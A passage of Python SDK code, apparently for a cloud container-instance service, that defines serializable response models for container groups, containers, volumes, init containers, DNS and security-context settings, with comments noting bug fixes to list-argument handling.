            'ReadOnlyRootFilesystem': self.read_only_root_filesystem,
            'RunAsUser': self.run_as_user,
            'Capability': cap.to_map() if cap is not None else None,
        }

    def from_map(self, map={}):
        self.read_only_root_filesystem = map.get('ReadOnlyRootFilesystem')
        self.run_as_user = map.get('RunAsUser')
        if map.get('Capability') is None:
            self.capability = None
        else:
            self.capability = DescribeContainerGroupsResponseContainerGroupsContainersSecurityContextCapability().from_map(map['Capability'])
        return self
class DescribeContainerGroupsResponseContainerGroupsContainers(TeaModel):
    """A single container of a container group in DescribeContainerGroups."""

    def __init__(self, name=None, image=None, memory=None, cpu=None, restart_count=None, working_dir=None, image_pull_policy=None, ready=None, gpu=None, stdin=None, stdin_once=None, tty=None, volume_mounts=None, ports=None, environment_vars=None, previous_state=None, current_state=None, readiness_probe=None, liveness_probe=None, security_context=None, commands=None, args=None):
        self.name = name
        self.image = image
        self.memory = memory
        self.cpu = cpu
        self.restart_count = restart_count
        self.working_dir = working_dir
        self.image_pull_policy = image_pull_policy
        self.ready = ready
        self.gpu = gpu
        self.stdin = stdin
        self.stdin_once = stdin_once
        self.tty = tty
        # Bug fix: the list-typed constructor arguments below were previously
        # discarded and the fields unconditionally reset to []; honor
        # caller-supplied values while keeping [] as the default.
        self.volume_mounts = volume_mounts if volume_mounts is not None else []
        self.ports = ports if ports is not None else []
        self.environment_vars = (environment_vars
                                 if environment_vars is not None else [])
        self.previous_state = previous_state
        self.current_state = current_state
        self.readiness_probe = readiness_probe
        self.liveness_probe = liveness_probe
        self.security_context = security_context
        self.commands = commands if commands is not None else []
        self.args = args if args is not None else []

    def validate(self):
        # Required scalar fields.
        for val, label in ((self.name, 'name'), (self.image, 'image'),
                           (self.memory, 'memory'), (self.cpu, 'cpu'),
                           (self.restart_count, 'restart_count'),
                           (self.working_dir, 'working_dir'),
                           (self.image_pull_policy, 'image_pull_policy'),
                           (self.ready, 'ready'), (self.gpu, 'gpu'),
                           (self.stdin, 'stdin'),
                           (self.stdin_once, 'stdin_once'),
                           (self.tty, 'tty')):
            self.validate_required(val, label)
        # Required repeated sub-models: validate each element as well.
        for lst, label in ((self.volume_mounts, 'volume_mounts'),
                           (self.ports, 'ports'),
                           (self.environment_vars, 'environment_vars')):
            self.validate_required(lst, label)
            if lst:
                for k in lst:
                    if k:
                        k.validate()
        # Required singular sub-models.
        for child, label in ((self.previous_state, 'previous_state'),
                             (self.current_state, 'current_state'),
                             (self.readiness_probe, 'readiness_probe'),
                             (self.liveness_probe, 'liveness_probe'),
                             (self.security_context, 'security_context')):
            self.validate_required(child, label)
            if child:
                child.validate()
        self.validate_required(self.commands, 'commands')
        self.validate_required(self.args, 'args')

    def to_map(self):
        """Serialize to wire-format keys; None lists/models serialize as None."""
        result = {}
        result['Name'] = self.name
        result['Image'] = self.image
        result['Memory'] = self.memory
        result['Cpu'] = self.cpu
        result['RestartCount'] = self.restart_count
        result['WorkingDir'] = self.working_dir
        result['ImagePullPolicy'] = self.image_pull_policy
        result['Ready'] = self.ready
        result['Gpu'] = self.gpu
        result['Stdin'] = self.stdin
        result['StdinOnce'] = self.stdin_once
        result['Tty'] = self.tty
        for lst, key in ((self.volume_mounts, 'VolumeMounts'),
                         (self.ports, 'Ports'),
                         (self.environment_vars, 'EnvironmentVars')):
            result[key] = ([k.to_map() if k else None for k in lst]
                           if lst is not None else None)
        for child, key in ((self.previous_state, 'PreviousState'),
                           (self.current_state, 'CurrentState'),
                           (self.readiness_probe, 'ReadinessProbe'),
                           (self.liveness_probe, 'LivenessProbe'),
                           (self.security_context, 'SecurityContext')):
            result[key] = child.to_map() if child is not None else None
        result['Commands'] = (list(self.commands)
                              if self.commands is not None else None)
        result['Args'] = list(self.args) if self.args is not None else None
        return result

    def from_map(self, map=None):
        """Populate fields from *map*; returns self."""
        map = {} if map is None else map
        self.name = map.get('Name')
        self.image = map.get('Image')
        self.memory = map.get('Memory')
        self.cpu = map.get('Cpu')
        self.restart_count = map.get('RestartCount')
        self.working_dir = map.get('WorkingDir')
        self.image_pull_policy = map.get('ImagePullPolicy')
        self.ready = map.get('Ready')
        self.gpu = map.get('Gpu')
        self.stdin = map.get('Stdin')
        self.stdin_once = map.get('StdinOnce')
        self.tty = map.get('Tty')
        # Repeated sub-models.
        for attr, key, model in (
                ('volume_mounts', 'VolumeMounts',
                 DescribeContainerGroupsResponseContainerGroupsContainersVolumeMounts),
                ('ports', 'Ports',
                 DescribeContainerGroupsResponseContainerGroupsContainersPorts),
                ('environment_vars', 'EnvironmentVars',
                 DescribeContainerGroupsResponseContainerGroupsContainersEnvironmentVars)):
            raw = map.get(key)
            setattr(self, attr,
                    [model().from_map(k) for k in raw] if raw is not None else None)
        # Singular sub-models.
        for attr, key, model in (
                ('previous_state', 'PreviousState',
                 DescribeContainerGroupsResponseContainerGroupsContainersPreviousState),
                ('current_state', 'CurrentState',
                 DescribeContainerGroupsResponseContainerGroupsContainersCurrentState),
                ('readiness_probe', 'ReadinessProbe',
                 DescribeContainerGroupsResponseContainerGroupsContainersReadinessProbe),
                ('liveness_probe', 'LivenessProbe',
                 DescribeContainerGroupsResponseContainerGroupsContainersLivenessProbe),
                ('security_context', 'SecurityContext',
                 DescribeContainerGroupsResponseContainerGroupsContainersSecurityContext)):
            raw = map.get(key)
            setattr(self, attr, model().from_map(raw) if raw is not None else None)
        commands = map.get('Commands')
        self.commands = list(commands) if commands is not None else None
        args = map.get('Args')
        self.args = list(args) if args is not None else None
        return self
class DescribeContainerGroupsResponseContainerGroupsVolumesConfigFileVolumeConfigFileToPaths(TeaModel):
    """One entry of a config-file volume: file content and target path."""

    def __init__(self, content=None, path=None):
        self.content = content
        self.path = path

    def validate(self):
        for val, label in ((self.content, 'content'), (self.path, 'path')):
            self.validate_required(val, label)

    def to_map(self):
        return {'Content': self.content, 'Path': self.path}

    def from_map(self, map={}):
        self.content = map.get('Content')
        self.path = map.get('Path')
        return self
class DescribeContainerGroupsResponseContainerGroupsVolumes(TeaModel):
    """One volume of a container group (NFS / disk / flex / config-file variants).

    Scalar fields describe the volume source; ``config_file_volume_config_file_to_paths``
    is a list of nested ``…ConfigFileVolumeConfigFileToPaths`` models.
    """

    # (python attribute, wire key) pairs for the scalar fields, in wire order.
    _SCALARS = (
        ('type', 'Type'),
        ('name', 'Name'),
        ('nfsvolume_path', 'NFSVolumePath'),
        ('nfsvolume_server', 'NFSVolumeServer'),
        ('nfsvolume_read_only', 'NFSVolumeReadOnly'),
        ('disk_volume_disk_id', 'DiskVolumeDiskId'),
        ('disk_volume_fs_type', 'DiskVolumeFsType'),
        ('flex_volume_driver', 'FlexVolumeDriver'),
        ('flex_volume_fs_type', 'FlexVolumeFsType'),
        ('flex_volume_options', 'FlexVolumeOptions'),
    )

    def __init__(self, type=None, name=None, nfsvolume_path=None, nfsvolume_server=None, nfsvolume_read_only=None, disk_volume_disk_id=None, disk_volume_fs_type=None, flex_volume_driver=None, flex_volume_fs_type=None, flex_volume_options=None, config_file_volume_config_file_to_paths=None):
        self.type = type
        self.name = name
        self.nfsvolume_path = nfsvolume_path
        self.nfsvolume_server = nfsvolume_server
        self.nfsvolume_read_only = nfsvolume_read_only
        self.disk_volume_disk_id = disk_volume_disk_id
        self.disk_volume_fs_type = disk_volume_fs_type
        self.flex_volume_driver = flex_volume_driver
        self.flex_volume_fs_type = flex_volume_fs_type
        self.flex_volume_options = flex_volume_options
        # BUG FIX: the original generated code discarded this argument and always
        # reset the field to []; honor a caller-supplied list (default stays []).
        self.config_file_volume_config_file_to_paths = (
            [] if config_file_volume_config_file_to_paths is None
            else config_file_volume_config_file_to_paths)

    def validate(self):
        """Check required fields and recurse into nested file-to-path models."""
        for attr, _ in self._SCALARS:
            self.validate_required(getattr(self, attr), attr)
        self.validate_required(self.config_file_volume_config_file_to_paths,
                               'config_file_volume_config_file_to_paths')
        if self.config_file_volume_config_file_to_paths:
            for item in self.config_file_volume_config_file_to_paths:
                if item:
                    item.validate()

    def to_map(self):
        """Serialize to the wire-format dict (None list stays None)."""
        result = {key: getattr(self, attr) for attr, key in self._SCALARS}
        if self.config_file_volume_config_file_to_paths is not None:
            result['ConfigFileVolumeConfigFileToPaths'] = [
                item.to_map() if item else None
                for item in self.config_file_volume_config_file_to_paths
            ]
        else:
            result['ConfigFileVolumeConfigFileToPaths'] = None
        return result

    def from_map(self, map={}):
        """Populate from the wire-format dict; returns self for chaining.

        ``map`` is never mutated, so the mutable default is harmless.
        """
        for attr, key in self._SCALARS:
            setattr(self, attr, map.get(key))
        raw = map.get('ConfigFileVolumeConfigFileToPaths')
        if raw is not None:
            self.config_file_volume_config_file_to_paths = [
                DescribeContainerGroupsResponseContainerGroupsVolumesConfigFileVolumeConfigFileToPaths().from_map(item)
                for item in raw
            ]
        else:
            self.config_file_volume_config_file_to_paths = None
        return self
class DescribeContainerGroupsResponseContainerGroupsInitContainersVolumeMounts(TeaModel):
    """A volume mount of an init container: volume name, mount path, read-only flag."""

    # (python attribute, wire key) pairs shared by validate/to_map/from_map.
    _FIELDS = (('name', 'Name'), ('mount_path', 'MountPath'), ('read_only', 'ReadOnly'))

    def __init__(self, name=None, mount_path=None, read_only=None):
        self.name = name
        self.mount_path = mount_path
        self.read_only = read_only

    def validate(self):
        # All three fields are required in the response.
        for attr, _ in self._FIELDS:
            self.validate_required(getattr(self, attr), attr)

    def to_map(self):
        """Serialize to the wire-format dict."""
        return {key: getattr(self, attr) for attr, key in self._FIELDS}

    def from_map(self, map={}):
        """Populate from the wire-format dict; returns self for chaining."""
        for attr, key in self._FIELDS:
            setattr(self, attr, map.get(key))
        return self
class DescribeContainerGroupsResponseContainerGroupsInitContainersPorts(TeaModel):
    """A port exposed by an init container: port number and protocol."""

    # (python attribute, wire key) pairs shared by validate/to_map/from_map.
    _FIELDS = (('port', 'Port'), ('protocol', 'Protocol'))

    def __init__(self, port=None, protocol=None):
        self.port = port
        self.protocol = protocol

    def validate(self):
        # Both fields are required in the response.
        for attr, _ in self._FIELDS:
            self.validate_required(getattr(self, attr), attr)

    def to_map(self):
        """Serialize to the wire-format dict."""
        return {key: getattr(self, attr) for attr, key in self._FIELDS}

    def from_map(self, map={}):
        """Populate from the wire-format dict; returns self for chaining."""
        for attr, key in self._FIELDS:
            setattr(self, attr, map.get(key))
        return self
class DescribeContainerGroupsResponseContainerGroupsInitContainersEnvironmentVarsValueFromFieldRef(TeaModel):
    """Field-path reference used as the source of an environment variable value."""

    def __init__(self, field_path=None):
        self.field_path = field_path  # required field-path string

    def validate(self):
        self.validate_required(self.field_path, 'field_path')

    def to_map(self):
        """Serialize to the wire-format dict."""
        return {'FieldPath': self.field_path}

    def from_map(self, map={}):
        """Populate from the wire-format dict; returns self for chaining."""
        self.field_path = map.get('FieldPath')
        return self
class DescribeContainerGroupsResponseContainerGroupsInitContainersEnvironmentVarsValueFrom(TeaModel):
    """Indirect source of an environment-variable value (wraps a FieldRef model)."""

    def __init__(self, field_ref=None):
        self.field_ref = field_ref  # nested ...FieldRef model; required

    def validate(self):
        self.validate_required(self.field_ref, 'field_ref')
        if self.field_ref:
            self.field_ref.validate()

    def to_map(self):
        """Serialize to the wire-format dict (nested model serialized recursively)."""
        field_ref = self.field_ref
        return {'FieldRef': field_ref.to_map() if field_ref is not None else None}

    def from_map(self, map={}):
        """Populate from the wire-format dict; returns self for chaining."""
        raw = map.get('FieldRef')
        if raw is None:
            self.field_ref = None
        else:
            self.field_ref = DescribeContainerGroupsResponseContainerGroupsInitContainersEnvironmentVarsValueFromFieldRef().from_map(raw)
        return self
class DescribeContainerGroupsResponseContainerGroupsInitContainersEnvironmentVars(TeaModel):
    """One environment variable of an init container: key, literal value, and source."""

    def __init__(self, key=None, value=None, value_from=None):
        self.key = key
        self.value = value
        self.value_from = value_from  # nested ...ValueFrom model or None

    def validate(self):
        self.validate_required(self.key, 'key')
        self.validate_required(self.value, 'value')
        self.validate_required(self.value_from, 'value_from')
        if self.value_from:
            self.value_from.validate()

    def to_map(self):
        """Serialize to the wire-format dict (nested model serialized recursively)."""
        value_from = self.value_from
        return {
            'Key': self.key,
            'Value': self.value,
            'ValueFrom': value_from.to_map() if value_from is not None else None,
        }

    def from_map(self, map={}):
        """Populate from the wire-format dict; returns self for chaining."""
        self.key = map.get('Key')
        self.value = map.get('Value')
        raw = map.get('ValueFrom')
        if raw is None:
            self.value_from = None
        else:
            self.value_from = DescribeContainerGroupsResponseContainerGroupsInitContainersEnvironmentVarsValueFrom().from_map(raw)
        return self
class DescribeContainerGroupsResponseContainerGroupsInitContainersPreviousState(TeaModel):
    """Snapshot of an init container's previous run: state, exit code, timing, reason."""

    # (python attribute, wire key) pairs shared by validate/to_map/from_map.
    _FIELDS = (
        ('state', 'State'),
        ('detail_status', 'DetailStatus'),
        ('exit_code', 'ExitCode'),
        ('start_time', 'StartTime'),
        ('finish_time', 'FinishTime'),
        ('reason', 'Reason'),
        ('message', 'Message'),
        ('signal', 'Signal'),
    )

    def __init__(self, state=None, detail_status=None, exit_code=None, start_time=None, finish_time=None, reason=None, message=None, signal=None):
        self.state = state
        self.detail_status = detail_status
        self.exit_code = exit_code
        self.start_time = start_time
        self.finish_time = finish_time
        self.reason = reason
        self.message = message
        self.signal = signal

    def validate(self):
        # Every field is required in the response.
        for attr, _ in self._FIELDS:
            self.validate_required(getattr(self, attr), attr)

    def to_map(self):
        """Serialize to the wire-format dict."""
        return {key: getattr(self, attr) for attr, key in self._FIELDS}

    def from_map(self, map={}):
        """Populate from the wire-format dict; returns self for chaining."""
        for attr, key in self._FIELDS:
            setattr(self, attr, map.get(key))
        return self
class DescribeContainerGroupsResponseContainerGroupsInitContainersCurrentState(TeaModel):
    """Snapshot of an init container's current run: state, exit code, timing, reason."""

    # (python attribute, wire key) pairs shared by validate/to_map/from_map.
    _FIELDS = (
        ('state', 'State'),
        ('detail_status', 'DetailStatus'),
        ('exit_code', 'ExitCode'),
        ('start_time', 'StartTime'),
        ('finish_time', 'FinishTime'),
        ('reason', 'Reason'),
        ('message', 'Message'),
        ('signal', 'Signal'),
    )

    def __init__(self, state=None, detail_status=None, exit_code=None, start_time=None, finish_time=None, reason=None, message=None, signal=None):
        self.state = state
        self.detail_status = detail_status
        self.exit_code = exit_code
        self.start_time = start_time
        self.finish_time = finish_time
        self.reason = reason
        self.message = message
        self.signal = signal

    def validate(self):
        # Every field is required in the response.
        for attr, _ in self._FIELDS:
            self.validate_required(getattr(self, attr), attr)

    def to_map(self):
        """Serialize to the wire-format dict."""
        return {key: getattr(self, attr) for attr, key in self._FIELDS}

    def from_map(self, map={}):
        """Populate from the wire-format dict; returns self for chaining."""
        for attr, key in self._FIELDS:
            setattr(self, attr, map.get(key))
        return self
class DescribeContainerGroupsResponseContainerGroupsInitContainersSecurityContextCapability(TeaModel):
    """Capabilities added to an init container's security context.

    ``adds`` is a plain list of capability-name strings.
    """

    def __init__(self, adds=None):
        # BUG FIX: the original generated code discarded the ``adds`` argument
        # and always reset the field to []; honor a caller-supplied list.
        self.adds = [] if adds is None else adds

    def validate(self):
        self.validate_required(self.adds, 'adds')

    def to_map(self):
        """Serialize to the wire-format dict (None list stays None)."""
        result = {}
        if self.adds is not None:
            # Copy so later mutation of self.adds cannot leak into the map.
            result['Adds'] = list(self.adds)
        else:
            result['Adds'] = None
        return result

    def from_map(self, map={}):
        """Populate from the wire-format dict; returns self for chaining.

        ``map`` is never mutated, so the mutable default is harmless.
        """
        raw = map.get('Adds')
        self.adds = list(raw) if raw is not None else None
        return self
class DescribeContainerGroupsResponseContainerGroupsInitContainersSecurityContext(TeaModel):
    """Security context of an init container: root-FS mode, run-as user, capabilities."""

    def __init__(self, read_only_root_filesystem=None, run_as_user=None, capability=None):
        self.read_only_root_filesystem = read_only_root_filesystem
        self.run_as_user = run_as_user
        self.capability = capability  # nested Capability model or None

    def validate(self):
        self.validate_required(self.read_only_root_filesystem, 'read_only_root_filesystem')
        self.validate_required(self.run_as_user, 'run_as_user')
        self.validate_required(self.capability, 'capability')
        if self.capability:
            self.capability.validate()

    def to_map(self):
        """Serialize to the wire-format dict (nested model serialized recursively)."""
        capability = self.capability
        return {
            'ReadOnlyRootFilesystem': self.read_only_root_filesystem,
            'RunAsUser': self.run_as_user,
            'Capability': capability.to_map() if capability is not None else None,
        }

    def from_map(self, map={}):
        """Populate from the wire-format dict; returns self for chaining."""
        self.read_only_root_filesystem = map.get('ReadOnlyRootFilesystem')
        self.run_as_user = map.get('RunAsUser')
        raw = map.get('Capability')
        if raw is None:
            self.capability = None
        else:
            self.capability = DescribeContainerGroupsResponseContainerGroupsInitContainersSecurityContextCapability().from_map(raw)
        return self
class DescribeContainerGroupsResponseContainerGroupsInitContainers(TeaModel):
    """One init container of a container group.

    Scalar fields describe the container spec; ``volume_mounts`` / ``ports`` /
    ``environment_vars`` are lists of nested models, ``previous_state`` /
    ``current_state`` / ``security_context`` are single nested models, and
    ``command`` / ``args`` are plain string lists.
    """

    # (python attribute, wire key) pairs for the scalar fields, in wire order.
    _SCALARS = (
        ('name', 'Name'),
        ('image', 'Image'),
        ('cpu', 'Cpu'),
        ('memory', 'Memory'),
        ('restart_count', 'RestartCount'),
        ('working_dir', 'WorkingDir'),
        ('image_pull_policy', 'ImagePullPolicy'),
        ('ready', 'Ready'),
        ('gpu', 'Gpu'),
    )
    # List-of-model fields and plain-list fields, in wire order.
    _MODEL_LIST_KEYS = (('volume_mounts', 'VolumeMounts'), ('ports', 'Ports'),
                        ('environment_vars', 'EnvironmentVars'))
    _SUBMODEL_KEYS = (('previous_state', 'PreviousState'),
                      ('current_state', 'CurrentState'),
                      ('security_context', 'SecurityContext'))
    _PLAIN_LIST_KEYS = (('command', 'Command'), ('args', 'Args'))

    def __init__(self, name=None, image=None, cpu=None, memory=None, restart_count=None, working_dir=None, image_pull_policy=None, ready=None, gpu=None, volume_mounts=None, ports=None, environment_vars=None, previous_state=None, current_state=None, security_context=None, command=None, args=None):
        self.name = name
        self.image = image
        self.cpu = cpu
        self.memory = memory
        self.restart_count = restart_count
        self.working_dir = working_dir
        self.image_pull_policy = image_pull_policy
        self.ready = ready
        self.gpu = gpu
        # BUG FIX: the five list arguments below used to be silently discarded
        # (the generated code always reset them to []); honor supplied values
        # while keeping [] as the default.
        self.volume_mounts = [] if volume_mounts is None else volume_mounts
        self.ports = [] if ports is None else ports
        self.environment_vars = [] if environment_vars is None else environment_vars
        self.previous_state = previous_state
        self.current_state = current_state
        self.security_context = security_context
        self.command = [] if command is None else command
        self.args = [] if args is None else args

    def validate(self):
        """Check required fields and recurse into nested models."""
        for attr, _ in self._SCALARS:
            self.validate_required(getattr(self, attr), attr)
        for attr, _ in self._MODEL_LIST_KEYS:
            items = getattr(self, attr)
            self.validate_required(items, attr)
            if items:
                for item in items:
                    if item:
                        item.validate()
        for attr, _ in self._SUBMODEL_KEYS:
            sub = getattr(self, attr)
            self.validate_required(sub, attr)
            if sub:
                sub.validate()
        for attr, _ in self._PLAIN_LIST_KEYS:
            self.validate_required(getattr(self, attr), attr)

    def to_map(self):
        """Serialize to the wire-format dict (None lists/models stay None)."""
        result = {key: getattr(self, attr) for attr, key in self._SCALARS}
        for attr, key in self._MODEL_LIST_KEYS:
            items = getattr(self, attr)
            result[key] = ([item.to_map() if item else None for item in items]
                           if items is not None else None)
        for attr, key in self._SUBMODEL_KEYS:
            sub = getattr(self, attr)
            result[key] = sub.to_map() if sub is not None else None
        for attr, key in self._PLAIN_LIST_KEYS:
            items = getattr(self, attr)
            result[key] = list(items) if items is not None else None
        return result

    def from_map(self, map={}):
        """Populate from the wire-format dict; returns self for chaining.

        ``map`` is never mutated, so the mutable default is harmless.
        """
        for attr, key in self._SCALARS:
            setattr(self, attr, map.get(key))
        model_lists = (
            ('volume_mounts', 'VolumeMounts',
             DescribeContainerGroupsResponseContainerGroupsInitContainersVolumeMounts),
            ('ports', 'Ports',
             DescribeContainerGroupsResponseContainerGroupsInitContainersPorts),
            ('environment_vars', 'EnvironmentVars',
             DescribeContainerGroupsResponseContainerGroupsInitContainersEnvironmentVars),
        )
        for attr, key, model_cls in model_lists:
            raw = map.get(key)
            setattr(self, attr,
                    [model_cls().from_map(item) for item in raw] if raw is not None else None)
        submodels = (
            ('previous_state', 'PreviousState',
             DescribeContainerGroupsResponseContainerGroupsInitContainersPreviousState),
            ('current_state', 'CurrentState',
             DescribeContainerGroupsResponseContainerGroupsInitContainersCurrentState),
            ('security_context', 'SecurityContext',
             DescribeContainerGroupsResponseContainerGroupsInitContainersSecurityContext),
        )
        for attr, key, model_cls in submodels:
            raw = map.get(key)
            setattr(self, attr, model_cls().from_map(raw) if raw is not None else None)
        for attr, key in self._PLAIN_LIST_KEYS:
            raw = map.get(key)
            setattr(self, attr, list(raw) if raw is not None else None)
        return self
class DescribeContainerGroupsResponseContainerGroupsHostAliases(TeaModel):
    """A host-alias entry of a container group: one IP mapped to hostnames.

    ``hostnames`` is a plain list of hostname strings.
    """

    def __init__(self, ip=None, hostnames=None):
        self.ip = ip
        # BUG FIX: the original generated code discarded the ``hostnames``
        # argument and always reset the field to []; honor a supplied list.
        self.hostnames = [] if hostnames is None else hostnames

    def validate(self):
        self.validate_required(self.ip, 'ip')
        self.validate_required(self.hostnames, 'hostnames')

    def to_map(self):
        """Serialize to the wire-format dict (None list stays None)."""
        result = {'Ip': self.ip}
        # Copy so later mutation of self.hostnames cannot leak into the map.
        result['Hostnames'] = list(self.hostnames) if self.hostnames is not None else None
        return result

    def from_map(self, map={}):
        """Populate from the wire-format dict; returns self for chaining.

        ``map`` is never mutated, so the mutable default is harmless.
        """
        self.ip = map.get('Ip')
        raw = map.get('Hostnames')
        self.hostnames = list(raw) if raw is not None else None
        return self
class DescribeContainerGroupsResponseContainerGroupsDnsConfigOptions(TeaModel):
    """One DNS resolver option of a container group: name/value pair."""

    # (python attribute, wire key) pairs shared by validate/to_map/from_map.
    _FIELDS = (('name', 'Name'), ('value', 'Value'))

    def __init__(self, name=None, value=None):
        self.name = name
        self.value = value

    def validate(self):
        # Both fields are required in the response.
        for attr, _ in self._FIELDS:
            self.validate_required(getattr(self, attr), attr)

    def to_map(self):
        """Serialize to the wire-format dict."""
        return {key: getattr(self, attr) for attr, key in self._FIELDS}

    def from_map(self, map={}):
        """Populate from the wire-format dict; returns self for chaining."""
        for attr, key in self._FIELDS:
            setattr(self, attr, map.get(key))
        return self
class DescribeContainerGroupsResponseContainerGroupsDnsConfig(TeaModel):
    """DNS configuration of a container group.

    ``options`` is a list of nested ``…DnsConfigOptions`` models;
    ``name_servers`` and ``searches`` are plain string lists.
    """

    def __init__(self, options=None, name_servers=None, searches=None):
        # BUG FIX: the original generated code discarded all three arguments
        # and always reset the fields to []; honor supplied lists.
        self.options = [] if options is None else options
        self.name_servers = [] if name_servers is None else name_servers
        self.searches = [] if searches is None else searches

    def validate(self):
        """Check required fields and recurse into nested option models."""
        self.validate_required(self.options, 'options')
        if self.options:
            for option in self.options:
                if option:
                    option.validate()
        self.validate_required(self.name_servers, 'name_servers')
        self.validate_required(self.searches, 'searches')

    def to_map(self):
        """Serialize to the wire-format dict (None lists stay None)."""
        result = {}
        result['Options'] = ([option.to_map() if option else None for option in self.options]
                             if self.options is not None else None)
        # Copies so later mutation of the attributes cannot leak into the map.
        result['NameServers'] = list(self.name_servers) if self.name_servers is not None else None
        result['Searches'] = list(self.searches) if self.searches is not None else None
        return result

    def from_map(self, map={}):
        """Populate from the wire-format dict; returns self for chaining.

        ``map`` is never mutated, so the mutable default is harmless.
        """
        raw_options = map.get('Options')
        if raw_options is not None:
            self.options = [
                DescribeContainerGroupsResponseContainerGroupsDnsConfigOptions().from_map(item)
                for item in raw_options
            ]
        else:
            self.options = None
        raw_servers = map.get('NameServers')
        self.name_servers = list(raw_servers) if raw_servers is not None else None
        raw_searches = map.get('Searches')
        self.searches = list(raw_searches) if raw_searches is not None else None
        return self
class DescribeContainerGroupsResponseContainerGroupsEciSecurityContextSysctls(TeaModel):
    """One sysctl setting of the ECI security context: name/value pair."""

    # (python attribute, wire key) pairs shared by validate/to_map/from_map.
    _FIELDS = (('name', 'Name'), ('value', 'Value'))

    def __init__(self, name=None, value=None):
        self.name = name
        self.value = value

    def validate(self):
        # Both fields are required in the response.
        for attr, _ in self._FIELDS:
            self.validate_required(getattr(self, attr), attr)

    def to_map(self):
        """Serialize to the wire-format dict."""
        return {key: getattr(self, attr) for attr, key in self._FIELDS}

    def from_map(self, map={}):
        """Populate from the wire-format dict; returns self for chaining."""
        for attr, key in self._FIELDS:
            setattr(self, attr, map.get(key))
        return self
class DescribeContainerGroupsResponseContainerGroupsEciSecurityContext(TeaModel):
    """ECI-level security context of a container group.

    ``sysctls`` is a list of nested ``…EciSecurityContextSysctls`` models.
    """

    def __init__(self, sysctls=None):
        # BUG FIX: the original generated code discarded the ``sysctls``
        # argument and always reset the field to []; honor a supplied list.
        self.sysctls = [] if sysctls is None else sysctls

    def validate(self):
        """Check the required list and recurse into nested sysctl models."""
        self.validate_required(self.sysctls, 'sysctls')
        if self.sysctls:
            for sysctl in self.sysctls:
                if sysctl:
                    sysctl.validate()

    def to_map(self):
        """Serialize to the wire-format dict (None list stays None)."""
        result = {}
        if self.sysctls is not None:
            result['Sysctls'] = [s.to_map() if s else None for s in self.sysctls]
        else:
            result['Sysctls'] = None
        return result

    def from_map(self, map={}):
        """Populate from the wire-format dict; returns self for chaining.

        ``map`` is never mutated, so the mutable default is harmless.
        """
        raw = map.get('Sysctls')
        if raw is not None:
            self.sysctls = [
                DescribeContainerGroupsResponseContainerGroupsEciSecurityContextSysctls().from_map(item)
                for item in raw
            ]
        else:
            self.sysctls = None
        return self
class DescribeContainerGroupsResponseContainerGroups(TeaModel):
    """One container group returned by DescribeContainerGroups.

    Scalar fields cover identity, placement, networking, timing and billing;
    the nested collections (``tags``, ``events``, ``containers``, ``volumes``,
    ``init_containers``, ``host_aliases``) hold lists of sub-models, and
    ``dns_config`` / ``eci_security_context`` are single sub-models.
    """

    # (python attribute, wire key) pairs for the scalar fields, in wire order.
    _SCALARS = (
        ('container_group_id', 'ContainerGroupId'),
        ('container_group_name', 'ContainerGroupName'),
        ('region_id', 'RegionId'),
        ('zone_id', 'ZoneId'),
        ('memory', 'Memory'),
        ('cpu', 'Cpu'),
        ('v_switch_id', 'VSwitchId'),
        ('security_group_id', 'SecurityGroupId'),
        ('restart_policy', 'RestartPolicy'),
        ('intranet_ip', 'IntranetIp'),
        ('status', 'Status'),
        ('internet_ip', 'InternetIp'),
        ('creation_time', 'CreationTime'),
        ('succeeded_time', 'SucceededTime'),
        ('eni_instance_id', 'EniInstanceId'),
        ('instance_type', 'InstanceType'),
        ('expired_time', 'ExpiredTime'),
        ('failed_time', 'FailedTime'),
        ('ram_role_name', 'RamRoleName'),
        ('ipv_6address', 'Ipv6Address'),
        ('vpc_id', 'VpcId'),
        ('discount', 'Discount'),
        ('resource_group_id', 'ResourceGroupId'),
        ('tenant_eni_instance_id', 'TenantEniInstanceId'),
        ('tenant_vswitch_id', 'TenantVSwitchId'),
        ('tenant_security_group_id', 'TenantSecurityGroupId'),
        ('spot_strategy', 'SpotStrategy'),
    )
    # (python attribute, wire key) pairs for the list-of-model fields.
    _MODEL_LIST_KEYS = (
        ('tags', 'Tags'),
        ('events', 'Events'),
        ('containers', 'Containers'),
        ('volumes', 'Volumes'),
        ('init_containers', 'InitContainers'),
        ('host_aliases', 'HostAliases'),
    )

    def __init__(self, container_group_id=None, container_group_name=None, region_id=None, zone_id=None, memory=None, cpu=None, v_switch_id=None, security_group_id=None, restart_policy=None, intranet_ip=None, status=None, internet_ip=None, creation_time=None, succeeded_time=None, eni_instance_id=None, instance_type=None, expired_time=None, failed_time=None, ram_role_name=None, ipv_6address=None, vpc_id=None, discount=None, resource_group_id=None, tenant_eni_instance_id=None, tenant_vswitch_id=None, tenant_security_group_id=None, spot_strategy=None, tags=None, events=None, containers=None, volumes=None, init_containers=None, host_aliases=None, dns_config=None, eci_security_context=None):
        self.container_group_id = container_group_id
        self.container_group_name = container_group_name
        self.region_id = region_id
        self.zone_id = zone_id
        self.memory = memory
        self.cpu = cpu
        self.v_switch_id = v_switch_id
        self.security_group_id = security_group_id
        self.restart_policy = restart_policy
        self.intranet_ip = intranet_ip
        self.status = status
        self.internet_ip = internet_ip
        self.creation_time = creation_time
        self.succeeded_time = succeeded_time
        self.eni_instance_id = eni_instance_id
        self.instance_type = instance_type
        self.expired_time = expired_time
        self.failed_time = failed_time
        self.ram_role_name = ram_role_name
        self.ipv_6address = ipv_6address
        self.vpc_id = vpc_id
        self.discount = discount
        self.resource_group_id = resource_group_id
        self.tenant_eni_instance_id = tenant_eni_instance_id
        self.tenant_vswitch_id = tenant_vswitch_id
        self.tenant_security_group_id = tenant_security_group_id
        self.spot_strategy = spot_strategy
        # BUG FIX: the six list arguments below used to be silently discarded
        # (the generated code always reset them to []); honor supplied values
        # while keeping [] as the default.
        self.tags = [] if tags is None else tags
        self.events = [] if events is None else events
        self.containers = [] if containers is None else containers
        self.volumes = [] if volumes is None else volumes
        self.init_containers = [] if init_containers is None else init_containers
        self.host_aliases = [] if host_aliases is None else host_aliases
        self.dns_config = dns_config
        self.eci_security_context = eci_security_context

    def validate(self):
        """Check required fields and recurse into nested models."""
        for attr, _ in self._SCALARS:
            self.validate_required(getattr(self, attr), attr)
        for attr, _ in self._MODEL_LIST_KEYS:
            items = getattr(self, attr)
            self.validate_required(items, attr)
            if items:
                for item in items:
                    if item:
                        item.validate()
        self.validate_required(self.dns_config, 'dns_config')
        if self.dns_config:
            self.dns_config.validate()
        self.validate_required(self.eci_security_context, 'eci_security_context')
        if self.eci_security_context:
            self.eci_security_context.validate()

    def to_map(self):
